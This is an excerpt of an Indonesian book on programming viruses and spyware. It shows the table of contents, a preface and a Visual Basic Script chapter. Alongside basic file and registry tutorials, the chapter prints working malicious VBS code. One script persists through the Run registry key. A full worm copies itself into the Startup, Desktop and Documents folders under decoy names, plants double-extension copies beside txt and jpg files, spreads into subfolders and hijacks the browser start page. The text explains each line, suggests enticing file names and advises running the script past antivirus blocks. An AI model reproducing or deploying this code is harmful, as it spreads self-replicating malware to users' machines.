Pemrograman Virus & Spyware Hak Cipta © 2006 pada penulis Hak Cipta dilindungi Undang-Undang Dilarang memperbanyak atau memindahkan sebagian atau seluruh isi buku ini dalam bentuk apapun, baik secara elektronis maupun mekanis, termasuk memfotocopy, merekam atau dengan sistem penyimpanan lainnya, tanpa izin tertulis dari Penulis dan Penerbit ISBN 979-98545-9-8 Cetakan pertama : Juni 2006 Publisher Jasakom Web Site http://www.jasakom.com/penerbitan Email admin@jasakom.com Address PO BOX 6179 JKB Cover Design, Idea & Layout S’to Ketentuan pidana pasal 72 UU No 19 tahun 2002 Barang siapa dengan sengaja dan tanpa hak melakukan kegiatan sebagaimana dimaksud dalam pasal ayat (1) atau pasal 49 ayat (1) dan ayat (2) dipidana dengan pidana penjara paling singkat (satu) bulan dan/atau denda paling sedikit Rp 1.000.000 (satu juta rupiah) atau pidana penjara paling lama (tujuh) tahun dan/ atau denda paling banyak Rp 5.000.000.000.00 (lima miliar rupiah) Barang siapa dengan sengaja menyiarkan, memamerkan, mengedarkan, atau menjual kepada umum suatu Ciptaan atau barang hasil pelanggaran Hak Cipta atau Hak Terkait sebagaimana dimaksud pada ayat (1), dipidana dengan pidana penjara paling lama (lima) tahun dan/atau denda paling banyak Rp 500.000.000,00 (lima ratus juta rupiah) ii Daftar Isi BAB PENDAHULUAN BAB Pemrograman File Batch Echo 10 Start 10 Pause 11 Operator IO > dan >> 11 Del, Ren, Copy, Type 13 Menggunakan Parameter dengan %0, %1, %2, dst 14 Looping For 15 Pengkondisian IF dan perintah Goto 15 Perintah Exist 16 10 Perintah Exit 16 Membuat Virus Bat 22 BAB VISUAL BASIC SCRIPT 27 VBS Halo 27 VBS Penghandle Drive I 29 VBS Penghandle Drive II 30 VBS Penghandle Directory / Folder 33 VBS Penghandle File 35 Membuat file 35 Menambah isi file yang sudah ada 35 Membaca isi file 36 Memindah, Mengkopi dan Menghapus File 37 Contoh-Contoh Script VBS 39 iii Mengkopi diri ke suatu tempat 39 Mengeset attributes File 39 Mengakses dan menulis nilai ke registry 40 Memanggil Program lain 41 Menjalankan perintah DOS melalui VBS 42 Membuat Shortcut Program 42 Membuat Shortcut Alamat Website 42 TEKNIK PEMPROGRAMAN VBS DI FILE HTML/HTM 43 Virus VBS 47 Bab Pengenalan Visual Basic VB6 Penghandle Drive drive yang tersedia) 51 (Mendapatkan keseluruhan 56 VB6 Penghandle Drive II (Mendapatkan jenis drive) 57 VB6 Penghandle Folder (Mendapatkan daftar nama 58 folder yang ada) VB6 Penghandle Folder II (Mengetahui ada tidaknya 59 folder) VB6 Penghandle Folder III (mengubah attribute folder) 59 VB6 Penghandle File (Membuat File) 60 VB6 Penghandle File III (Mengeset attributes file) 63 VB6 Penghandle File IV (Mengambil isi file) 64 Menggandakan diri (Duplikasi) 65 Mendapatkan alamat folder-folder istimewa 65 Mengetahui ada tidaknya Flashdisk yang terpasang 67 Mengakses Registry 68 BAB KEYLOGGER iv 75 PROGRAM PENGONTROL 76 KEYLOGGER 96 BAB KEYLOGGER 113 Contoh (Encoder VBS) 115 Contoh (File Ganda) 119 Contoh (Pengubah daftar Task Manager) 124 PENGONTROL KEYLOGGER 132 KEYLOGGER2 146 BAB KEMAMPUAN TAMBAHAN KEYLOGGER 171 Program Penutup (Aplication Killer) 171 KeluarWindows (Logoff, Reboot, Shutdown dan Power- 183 off) Menyimpan Tampilan Layar Per Waktu 186 Program Binder 188 Pengendali Program Lain 193 Program Pemecah File 194 Program Pembuka Situs 198 Trik Mengunci File supaya tidak dapat dihapus 200 Trik menjalankan Program pada Safe Mode 201 10 Trik Backup file Runtime Msvbvm60.dll 202 203 BAB KEYLOGGER CRACKING 203 Menghadapi File Ganda 203 Melihat Isi File Hidden 214 Program Pengubah Caption 220 Program AntiCloseSendMessage 223 Program Penglihat Startup 224 Script Pemulih Registry 230 Crack Script VBS Terencode 232 Trik Mengatur File Runtime Msvbvm60.dll 232  KATA PENGANTAR Serangan virus, spyware dan program lainnya yang dianggap berbahaya semakin meningkat baik jumlah maupun kualitasnya, tak dipungkiri hal ini terjadi karena makin pesatnya ilmu pengetahuan dan penemuan-penemuan kelemahan suatu sistem operasi Untuk menangani hal ini kita tidak dapat berpangku tangan menunggu update vendor-vendor Antispyware, sementara spyware telah mengganggu aktivitas kita berkomputer Dan untuk menangani hal ini, kita harus mengetahui cara kerja dan teknik bertahan suatu spyware, dengan cara mengetahunya kita dapat dengan mudah membasmi dan mencegah supaya tidak terkena kembali Buku ini akan memaparkan kepada anda bagaimana teknik pemprograman yang digunakan spyware untuk dapat merekam aktivitas anda berkomputer dan bagaimana cara spyware tersebut untuk menyembunyikan hasil rekaman serta teknik bertahan spyware supaya tidak dengan mudah dihilangkan dari komputer yang telah diinfeksinya Kesemua teknik umum yang digunakan spyware atau program yang berbahaya diketengahkan dalam buku ini beserta teknik pemprogramannya di Visual Basic 6, dari teknik file ganda hingga teknik mematikan program lain yang dianggap berbahaya Tanpa Sensor, itulah kata yang tepat untuk buku ini Selain mengetengahkan bagaimana membuat spyware, dalam hal ini adalah keylogger, buku ini juga membahas bagaimana membuat Visual Basic Script dan file bat sebagai pendukung dari keylogger tersebut Contoh dukungan VBS adalah untuk melindungi file runtime msvbvm60.dll supaya tetap eksis, sedangkan file bat adalah untuk menggabungkan kembali file exe yang telah dipecah menjadi beberapa bagian Buku ini memang bukan buku yang mengetengahkan semua teknik pertahanan spyware, tetapi ia dapat menjadi bahan awal tentang bagaimana teknik yang dapat digunakan oleh spyware dalam vi mempertahankan dirinya Karena buku ini hanya mengemukakan teknik dasar dari pemprograman spyware Dan juga bagaimana teknik pemprograman untuk mengatasi pertahanan spyware tersebut Akhir kata, tiada gading yang tak retak, ilmu yang disampaikan dalam buku ini hanya bertujuan untuk menambah wawasan pembaca Dan mungkin ada yang salah ataupun kurang berkenan mohon dimaklumi karena penulis adalah manusia yang penuh dengan kekurangan Semoga ilmu yang disampaikan dalam buku ini berguna dan tidak disalahgunakan, karena ilmu itu seperti pedang, baik dan buruknya kembali pada pemakainya Tertanda, Ari W vii DAFTAR ISI PER BAB Pendahuluan Berisi tentang apa arti spyware dan bagaimana mengamankan data supaya tidak rusak karena program yang berbahaya Pemrograman File Bat Berisi tentang bagaimana file bat dibuat, bagaimana mengakses drive, folder dan file (membuat, menghapus dan merename) Serta bagaimana file bat menduplikasikan diri, termasuk juga bagaimana membuat virus bat Pemrograman Vbs Berisi tentang bagaimana membuat file VBS, bagaimana mengakses drive, folder dan file (membuat, menghapus dan merename) dan registry Serta bagaimana file vbs menduplikasikan diri dan mendapatkan info baik dari file maupun dari registry Semuanya ini disertai contoh kode termasuk kode spyware vbs Pemrograman VB6 Berisi tutorial dasar vb6 terutama yang berkaitan terhadap akses drive, folder, file dan registry Juga bagaimana teknik menduplikasikn diri viii Keylogger1 Bagaimana teknik pemprograman dasar suatu keylogger Kemampuan yang dimiliki keylogger disini minimalis sekali hanya mampu merekam ketukan tetapi sudah mampu merubah data nilai di registry Keylogger2 Pengembangan keylogger1, mempunyai pertahanan file ganda, melindungi file runtime VB6 Kemampuan Tambahan Keylogger Contoh-contoh kemampuan yang dapat ditambahan pada keylogger seperti mampu mematikan program lain, mampu membelah diri menjadi lebih kecil, mampu membinder program lain, mampu membuka situs secara otomatis, dan mampu mangambil tampilan layar Keylogger Cracking Berisi contoh-contoh program untuk mengatasi kemampuan yang dimiliki keylogger, seperti penonaktif file ganda, pengubah caption program, penglihat nilai-nilai di registry dan script vbs untuk memulihkan beberapa nilai di registry yang kemunginan akan dirubah ix Bab Visual Basic Script BAB VISUAL BASIC SCRIPT Teknik pemrograman VBS lebih rumit dan lebih banyak kode perintah di dalamnya di bandingkan file batch, untuk lebih jelasnya kita ambil contoh berikut: VBS Halo Kita akan membuat suatu file vbs yang mampu menerima input dari pemakainya, contohnya kita masukkan nama, maka akan muncul kotak dialog yang menampilkan tulisan Halo dan nama yang sebelumnya telah dimasukkan dari kotak input box Jadi setelah file vbsnya diklik (diopen) maka akan muncul kotak dialog seperti gambar berikut ini (gambar 3.1) : Gambar 3.1 Kotak Input dari script VBS 27 Jasakom Pemrograman Virus & Spyware J ika Batch File adalah script untuk lingkungan DOS yang mempunyai banyak keterbatasan, maka Visual Basic Script(VBS) adalah script yang berjalan di lingkungan Windows dengan banyak kelebihan, namun kekurangannya adalah tidak mampu dijalankan pada lingkungan DOS Jika Anda ingin mendapatkan semua kelebihan, kita mungkin saja menggabungkan kedua file tersebut Tentu hasilnya akan jauh lebih hebat Keren khan ? Bab Visual Basic Script 10 11 12 Dim fso, f1, ts, s, i Const ForReading = Set fso = CreateObject(”Scripting.FileSystemObject”) Set f1 = fso.CreateTextFile(”c:\Tes.txt”, False) f1.WriteLine ”Hello World” f1.WriteBlankLines(1) f1.WriteLine ”Hello Sayang” f1.Close Set ts = fso.OpenTextFile(”c:\Tes.txt”, ForReading) s = ts.ReadAll Msgbox s ts.Close 10 11 12 13 14 Dim fso, f1, ts, S, i Const ForReading = Set fso = CreateObject(”Scripting.FileSystemObject”) Set f1 = fso.CreateTextFile(”c:\Tes.txt”, True) f1.WriteLine ”Hello World” f1.WriteBlankLines(1) f1.WriteLine ”Hello Sayang” f1.Close Set ts = fso.OpenTextFile(”c:\Tes.txt”, ForReading) S = ts.ReadLine & vbnewline S = s & ts.readline & vbnewline S = s & ts.readline Msgbox S ts.Close Selain ReadAll dan ReadLine ada juga perintah pembacaan isi file per karakter, yaitu dengan perintah Read(no_karakter) Contohnya Read(5) akan membaca lima karakter awal dari sebuah file Memindah, Mengkopi dan Menghapus File Untuk memindah, mengkopi dan menghapus file dilakukan dengan cara mengambil file handle terlebih dahulu dengan perintah GetFile Selanjutnya diikuti oleh perintah MoveFile untuk memindah file, CopyFile untuk mengkopi file ke suatu tempat dan DeleteFile untuk menghapus file 37 Jasakom Pemrograman Virus & Spyware Kode perintah untuk membaca file tidak hanya ReadAll, ada juga perintah Readline untuk membaca file secara baris per baris Contoh script berikut ini akan memberikan hasil yang sama seperti pada contoh script sebelumnya : Bab Visual Basic Script Sebagai contoh, perhatikan file script berikut ini : Pemrograman Virus & Spyware 10 11 12 13 14 15 16 On Error Resume Next Dim fso, f1, f2, f3 Set fso = CreateObject(”Scripting.FileSystemObject”) Set f1 = fso.CreateTextFile(”c:\testfile.txt”, True) f1.Write (”Echo This is a test.”) f1.Close Set f2 = fso.GetFile(”c:\testfile.txt”) f2.Move (”d:\Percobaan.txt”) f2.Copy (”e:\Hasil.bat”) If msgbox(”Hapus file testfile di drive d dan e?”,VbOkCancel) = vbOk then Set f2 = fso.GetFile(”d:\Percobaan.txt ”) Set f3 = fso.GetFile(”e:\Hasil.bat ”) f2.Delete f3.Delete end if Proses yang terjadi dalam script ini adalah sebagai berikut : Mula-mula dibuat file text, dengan nama tesfile.txt di drive C: Selanjutnya pada baris perintah 8, file tersebut diambil nilai handlenya Selanjutnya, nilai handle ini akan merepresentasikan file yang diakses ini Pada baris perintah 9, file testfile.txt tersebut dipindahkan ke drive D: dan diganti namanya dengan nama Percobaan.txt Pada baris perintah 10, sekalipun file tersebut sudah tidak ada di drive C:, tetapi karena isi file sudah ada di dalam memory komputer, maka di bentuklah file bat di drive E: dengan nama file Hasil.bat yang isinya sama dengan file text testfile.txt Selanjutnya pada baris perintah 12 dan 13 diambil handle dari kedua file tersebut, yaitu d:\Percobaan.txt dan e:\Hasil.bat Dan dengan menggunakan perintah Delete kedua file tersebut dihapus 38 Jasakom Bab Visual Basic Script CONTOH-CONTOH SCRIPT VBS Ada banyak contoh script VBS yang menarik untuk dipelajari jika Anda ingin menjadi master VBS Berikut ini adalah contoh-contohnya : Mengkopi diri ke suatu tempat Seperti halnya file bat, file vbs juga mampu meduplikasikan dirinya ke tempat lainnya, contoh scriptnya adalah sebagai berikut : On error resume next Dim fso, Induk Set fso = CreateObject(”Scripting.FileSystemObject”) Set Induk = fso.GetFile(Wscript.ScriptFullName) Induk.Copy (”c:\Hantu.vbs”) Perintah pada baris ke-4 akan mengembalikan isi file vbs itu sendiri yang akan dimasukkan ke dalam variabel Induk, untuk kemudian dikopi ke drive C: dengan nama Hantu.vbs Dan perintah Wscript.ScriptFullName , akan dikembalikan nilai path dari file vbs itu sendiri Mengeset attributes File Salah satu kelebihan script VBS dibandingkan script bat adalah script vbs sanggup mengatur attribute file secara langsung Contohnya seperti mengeset attributes file text menjadi hidden dan read-only Contoh scriptnya adalah sebagai berikut : 10 On Error Resume Next Dim fso, f1, f2, f3 Set fso = CreateObject(”Scripting.FileSystemObject”) Set f1 = fso.CreateTextFile(”c:\testfile.txt”, True) Set f2 = fso.GetFile(”c:\testfile.txt”) f2.Attributes = If msgbox(”Normalkan ?”, vbokcancel)=vbOk then f2.Attributes = End if Dengan mengeset nilai angka melalui perintah Attributes maka dapat diatur attribute dari sebuah file Angka-angka tersebut artinya adalah sebagai berikut : 39 Jasakom Pemrograman Virus & Spyware Bab Visual Basic Script • • • • • = Normal 1= Readonly = Hidden = Readonly Hidden = System Pemrograman Virus & Spyware Mengakses dan menulis nilai ke registry Kemampuan vbs yang tidak kalah menariknya adalah kemampuannya untuk mengambil nilai registry dan memasukkan nilai tertentu ke dalam database konfigurasi komputer tersebut Contohnya pada script berikut ini : Dim reg Set reg = CreateObject(”WScript.Shell”) Msgbox ”Alamat folder ApplicationData adalah” & vbnewline & reg RegRead(”HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ Shell Folders\AppData”) If Msgbox (”Masukkan nilai ke registry”, VbOkCancel)=VbOk then reg.RegWrite ”HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,”http://www.Jasakom.com/” End if Untuk mengakses registry, pertama-tama kita harus membuat object shell untuk Wscript terlebih dahulu (perhatikan baris perintah ke 2) Setelah itu, kita akan mampu membaca ataupun memasukkan nilai ke dalam registry Nilai yang dimasukkan ke dalam registry dalam script ini berguna untuk mengubah alamat default dari program Internet Explorer (silahkan buka program internet Explorernya) Sebagai contoh tambahan, script berikut akan memasukkan nilai ke dalam registry yang berguna untuk menjalankan script ini secara otomatis saat komputer dihidupkan (kemampuan dari virus/spyware) Isi scriptnya adalah sebagai berikut : 40 On error resume next Dim fso, Induk, regedit Set fso = CreateObject(”Scripting.FileSystemObject”) Set Induk = fso.GetFile(Wscript.ScriptFullName) Induk.Copy (”c:\Hantu.vbs”) Set regedit = CreateObject(”WScript.Shell”) regedit.RegWrite ”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run\Testing”, ”c:\Hantu.vbs” Jasakom Bab Visual Basic Script Maka akan terbentuk nilai baru di registry yang berguna untuk menjalankan script Hantu.vbs saat pertama kali komputer dihidupkan Jika kita buka dengan Registry Editor (Regedit.exe) tampilannya akan seperti gambar 3.5 berikut ini : Saat script ini dijalankan ada kemungkinan program antivirus akan mendeteksi dan memblok script ini supaya tidak bekerja Jika Anda merasa tidak berbahaya untuk menjalankannya karena Anda sendiri yang membuatnya maka jalankan saja Tidak masalah bukan ? Memanggil Program lain Seperti halnya script file bat, script file vbs juga mampu memanggil program lain Contohnya kita akan memanggil file bat, yang bernama NC.bat yang alamatnya adalah c:\Batch\NC.bat, maka contoh isi script vbs-nya akan tampak seperti berikut ini : dim jalan set jalan = Wscript.CreateObject(”Wscript.Shell”) jalan.Run(”c:\Batch\NC.bat”) 41 Jasakom Pemrograman Virus & Spyware Gambar 3.5 Nilai Registry yang dimasukkan melalui VBS Bab Visual Basic Script Menjalankan perintah DOS melalui VBS Sekarang kita akan mencoba menjalankan perintah DOS tanpa membuat file bat Sebagai contoh perintah DOS yang digunakan adalah : ”Del c:\NC.bat”, maka isi script VBS-nya adalah sebagai berikut : Dim WSHShell, DOS Set WSHShell = WScript.CreateObject(”WScript.Shell”) DOS = WSHShell.ExpandEnvironmentStrings(”%comspec%”) WshShell.Run (DOS & ” /c Del c:\NC.bat”) Pemrograman Virus & Spyware Membuat Shortcut Program Kemampuan VBS yang tidak kalah menariknya adalah, kita mampu membuat file lnk (file shortcut) yang gunanya untuk memanggil program yang telah kita tentukan Sebagai contoh, kita menginginkan adanya shortcut untuk program Adobe Photoshop di Desktop komputer dengan nama LinkVBS Adobe maka isi script VBS-nya adalah sebagai berikut : Dim WSHShell, DPath, MyShortcut Set WSHShell = WScript.CreateObject(”WScript.Shell”) DPath = WSHShell.SpecialFolders(”Desktop”) Set MyShortcut = WSHShell.CreateShortcut(DPath & ”\LinkVBS Adobe lnk”) MyShortcut.TargetPath = WSHShell.ExpandEnvironmentStrings(”C:\Program Files\Adobe\Photoshop CS\Photoshop.exe”) MyShortcut.Save Teknik pembuatannya adalah : Tentukan nama file shortcut dengan perintah CreateShortcut Tentukan target shortcut tersebut dengan perintah TargetPath Simpan file shortcut tersebut dengan perintah Save Membuat Shortcut Alamat Website Kita akan membuat shortcut untuk alamat suatu website, jadi membuat suatu file url Sebagai contoh kita akan membuat file shortcut alamat Jasakom, maka isi script VBS-nya adalah sebagai berikut : 42 Dim WSHShell, Url set WSHShell = CreateObject(”WScript.Shell”) Set Url =WSHShell.CreateShortcut(”Jasakom.URL”) Url.TargetPath = ”http://www.Jasakom.com” Url.Save Jasakom Bab Visual Basic Script TEKNIK PEMPROGRAMAN VBS DI FILE HTML/HTM Selain dapat berdiri sendiri, VBS dapat digunakan di halaman web, yaitu dalam file htm dan html Contoh script VBS yang akan dimasukkan dalam halaman web adalah : Msgbox ”Halo” Maka isi file html-nya adalah sebagai berikut : Kotak Pesan dari VBS Jadi kode perintah visual basic script dalam file html, diapit perintah : Sebagai contoh tambahan adalah script VBS, yang berfungsi menerima input dari component lain di halaman html, yaitu Textbox Contoh script htmlnya adalah ebagai berikut : Simple Validation 10 Then MsgBox ”Please enter a number between and 10.” Else MsgBox ”Thank you.” End If Else MsgBox ”Please enter a numeric value.” End If End Sub > 43 Jasakom Pemrograman Virus & Spyware Bab Visual Basic Script Simple Validation Enter a value between and 10: Pemrograman Virus & Spyware Disini digunakan buah object dari Form halaman Html, yaitu Text dan Button (lihat Type = ”Text” dan Type = ”Button”) Hasil tampilan halaman webnya adalah seperti gambar 3.6 berikut ini : Gambar 3.6 Contoh penggunaan VBS dalam halaman Html Jadi setelah kita mengisi textbox dengan angka kemudian ditekan tombol yang bercaption Submit maka akan muncul kotak pesan Thank you Isi script vbs-nya adalah : Sub Button1_OnClick Dim TheForm Set TheForm = Document.ValidForm If IsNumeric(TheForm.Text1.Value) Then If TheForm.Text1.Value < Or TheForm.Text1.Value > 10 Then MsgBox ”Please enter a number between and 10.” Else MsgBox ”Thank you.” End If Else MsgBox ”Please enter a numeric value.” End If End Sub 44 Jasakom Bab Visual Basic Script Nilai Text1 pada form halaman web, diakses kode vbs dengan variabel TheForm.Text1.Value Sub prosedur vbs yang bernama Button1_OnClick digunakan oleh Button1 Jika yang menggunakannya bernama Tombol, maka nama sub prosedur VBS-nya adalah Tombol_OnClick Jadi saat tombol Button1 diklik, maka script vbs dalam event (kejadian) tersebut akan terjadi Selain event OnClick, masih banyak event-event lain, untuk lebih jelasnya dapat dilihat pada tabel berikut ini : Event Keterangan Saat object ditekan OnDblClick Saat object diklik dua kali OnMouseDown Saat object tersebut ditekan mouse OnMouseMove Saat object tersebut dilewati mouse tanpa menekan tombol mouse OnMouseOver Saat object tersebut dilewati mouse dengan menekan tombol mouse OnMouseOut Saat tombol mouse keluar dari object OnLoad Saat object di load di memory OnUnload Saat object di unload dari memory OnKeyDown Saat tombol keyboard ditekan dan ditahan OnKeyPress Saat tombol keyboard ditekan OnKeyUp Saat tombol keyboard dilepaskan dari tekanan OnSubmit Saat tombol Submit ditekan OnReset Saat tombol Reset ditekan OnSelect Saat pemilihan object, misalnya pada object Radio OnChange Saat isi textbox dirubah Sedangkan object-object form yang dimiliki file html antara lain adalah: Type Objcet Form Kegunaan Text Textbox biasa Password Textbox berkarakter password Checkbox Kotak cheklist Radio Untuk memilih dari beberapa item 45 Jasakom Pemrograman Virus & Spyware OnClick Bab Visual Basic Script Submit Tombol Submit Reset Tombol Reset Button Tombol Biasa Image Untuk menampung file gambar File Untuk mengopen file Pemrograman Virus & Spyware Jika Anda ingin supaya script VBS dimasukkan semuanya dalam file html, maka belum tentu script tersebut akan berjalan mulus, karena jika Anda menggunakan FileSystemObject, maka prosesnya kemungkinan besar akan diblok oleh Web Browser, seperti Internet Explorer Catatan tambahan Tanda titik dua (:) pada script vbs dikenal sebagai tanda untuk memisahkan baris perintah, misalnya : Dim Data: Data = Inputbox(”Tolong namanya ?”): Msgbox Data Mempunyai hasil yang sama dengan Dim Data Data = Inputbox(”Tolong namanya ?”) Msgbox Data Oke, setelah mempelajari cara pemprograman VBS Anda mungkin sudah mengetahui teknik virus dan spyware yang dikembangkan dari vbs Misalnya saja file vbs diset supaya menghapus semua file data yang ada dalam folder My Document, bahkan diset supaya berjalan secara otomatis melalui autorun, dan disembunyikan dengan bantuan file bat Ada tindakan pencegahan yang harus Anda lakukan pada system komputer, supaya Anda tidak terserang virus VBS, yaitu di Folder Option dari Windows Explorer, pada tab File Types, rubah program penghandle dari file VBS, misalnya dengan Notepad, jadi tampilannya seperti gambar 3.7 berikut ini 46 Jasakom Bab Visual Basic Script Virus VBS Seperti pada bab sebelumnya, di akhir bab ini akan saya tampilkan contoh script virus vbs Kemampuan virus VBS ini adalah bekerja autorun (berjalan secara otomatis) karena berada dalam folder startup Personal Menggunakan ekstensi ganda, yaitu jika dalam folder yang sama ada file berekstensi jpg maupun file txt maka script ini juga akan membuat file vbs dengan nama file yang sama Sebagai contoh, jika ada file Tutorial txt maka script vbs juga akan membuat file Tutorial.txt.vbs yang isinya adalah script itu sendiri Jika di dalam folder tersebut terdapat subfolder, maka file ini akan mengkopi dirinya ke dalam sub folder tersebut dengan nama file Readme.txt.vbs 47 Jasakom Pemrograman Virus & Spyware Gambar 3.7 Mengubah program default dari file vbs Bab Visual Basic Script Ada lokasi utama yang akan dimasuki script ini, yaitu di folder Startup, Desktop dan My Documents Personal Selain itu, program ini juga akan merubah alamat default website dari program Internet Explorer (jadi mirip adware ya), sehingga saat kita pertama kali membuka program Internet Explorer maka alamat website yang dibuka secara otomatis pertama kali adalah www.Jasakom.com Pemrograman Virus & Spyware Jadi sekalipun kita merubah alamat default dari Internet Explorer melalui Internet Option, namun ketika komputer dihidupkan kembali dan script VBS yang ada di folder Startup bekerja, maka alamat default dari Internet Explorer akan kembali menjadi www.Jasakom.com (inilah cara kerja program spyware yang menjengkelkan) Isi script Vbs tersebut adalah sebagai berikut : 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 On error resume next Dim WshShell, FSO, Induk, vPath, target, Lokasi Set WshShell = CreateObject(”Wscript.Shell”) Set FSO = CreateObject(”Scripting.FileSystemObject”) Set Induk = FSO.GetFile(Wscript.ScriptFullName) WshShell.RegWrite ”HKCU\Software\Microsoft\Internet Explorer\Main\ Start Page”,”http://www.Jasakom.com/” Lokasi = WshShell.SpecialFolders(”Startup”) Induk.Copy (Lokasi & ”\Adobe.vbs”) Lokasi = WshShell.SpecialFolders(”Desktop”) Induk.Copy (Lokasi & ”\Readme.vbs”) InfectFolder Lokasi Lokasi = WshShell.SpecialFolders(”MyDocuments”) Induk.Copy (Lokasi & ”\Gambar.vbs”) InfectFolder Lokasi vPath = Left(Induk, InStrRev(Induk, ”\”)) For Each target in FSO.GetFolder(vPath).Files If Right(target,3)=”txt” or Right(target,3)=”jpg” then Induk Copy(target & ”.vbs”) Next Sub InfectFolder(Alamat) on error resume next For Each target in FSO.GetFolder(Alamat).SubFolders Induk.copy(target & ”\Readme.vbs”) WshShell.Run (target & ”\Readme.vbs”) Next End sub Pendek sekali bukan kodenya, tapi proses yang terjadi cukup panjang 48 Jasakom Bab Visual Basic Script karena digunakan beberapa looping (perulangan) untuk mendapatkan semua nama file dan nama subfolder yang ada dalam suatu folder Untuk lebih jelasnya mari kita telaah perintah-perintah per barisnya Pada baris ke-3, dibentuk object Shell dengan tujuan untuk mendapatkan lokasi-lokasi folder istimewa Pada baris ke-4, dibentuk object file system dengan tujuan untuk menangani system file, seperti copy file, informasi nama folder dan sebagainya Baris ke-6 sengaja dikosongkan supaya memudahkan mempelajari script ini Pada baris ke-7, dimasukkan nilai ke dalam registry, yaitu dialamat HKCU\Software\Microsoft\Internet Explorer\Main\Start Page dengan nilai default http://www.Jasakom.com/ Pada baris ke-9, diambil data lokasi folder startup selanjutnya pada baris ke-8, dibuat file vbs di folder tesebut dengan nama Adobe.vbs Pada baris ke-12, diambil data lokasi folder Desktop untuk kemudian dibentuk file vbs dengan nama Readme.vbs Pada baris ke-16, diambil data lokasi folder My documents dari personal Kemudian dibentuk file vbs dengan nama file Gambar.vbs (bagaimana jika nama filenya Gambar cewek.vbs , pasti lebih banyak yang buka ya) Pada baris ke-14 dan 18, data dari lokasi folder digunakan untuk mendapatkan seluruh nama subfolder dengan menggunakan sub prosedur InfectFolder 10 Pada baris ke-20, diambil nama semua file yang berada dalam folder tersebut Jika ekstensi filenya txt atau jpg, maka nama file tersebut akan digunakan untuk membentuk file vbs baru Untuk lebih jelasnya bagaimana mendapatkan seluruh nama file tersebut mari kita buat script berikut ini : 49 Jasakom Pemrograman Virus & Spyware Pada baris ke-5, diambil alamat file script ini sendiri yang akan digunakan untuk pengkopian dirinya ke suatu tempat Bab Visual Basic Script Pemrograman Virus & Spyware On error resume next Dim FSO, Induk, vPath, target Set FSO = CreateObject(”Scripting.FileSystemObject”) Set Induk = FSO.GetFile(Wscript.ScriptFullName) vPath = Left(Induk, InStrRev(Induk, ”\”)) For Each target in FSO.GetFolder(vPath).Files Msgbox target Next Jika Anda jalankan script berikut ini, maka Anda akan mendapat kan seluruh nama file yang ada di dalam folder dimana script ini dijalankan 11 Pada baris ke-25, yaitu subprosedur InfectFolder, dicari nama semua subfolder yang berada dalam folder dimana script ini dijalankan, jika ada maka akan dibentuk file Readme.vbs dalam sub folder tersebut dan selanjutnya file tersebut dijalankan Dengan demikian, semua subfolder dalam subfolder di folder dimana script ini berada akan terinfeksi semua Selesai tutorial kita tentang teknik pemprograman Visual Basic Script, sekarang kita masuk teknik pemprograman dengan menggunakan Visual Basic untuk menghasilkan file exe 50 Jasakom ... berikut : 39 Jasakom Pemrograman Virus & Spyware Bab Visual Basic Script • • • • • = Normal 1= Readonly = Hidden = Readonly Hidden = System Pemrograman Virus & Spyware Mengakses dan menulis nilai... ketikkan melalui notepad adalah sebagai berikut : 31 Jasakom Pemrograman Virus & Spyware 10 11 12 13 14 15 16 17 18 Pemrograman Virus & Spyware Bab Visual Basic Script On error resume next Dim fso,... Jasakom Pemrograman Virus & Spyware Pada baris ke-5, diambil alamat file script ini sendiri yang akan digunakan untuk pengkopian dirinya ke suatu tempat Bab Visual Basic Script Pemrograman Virus & Spyware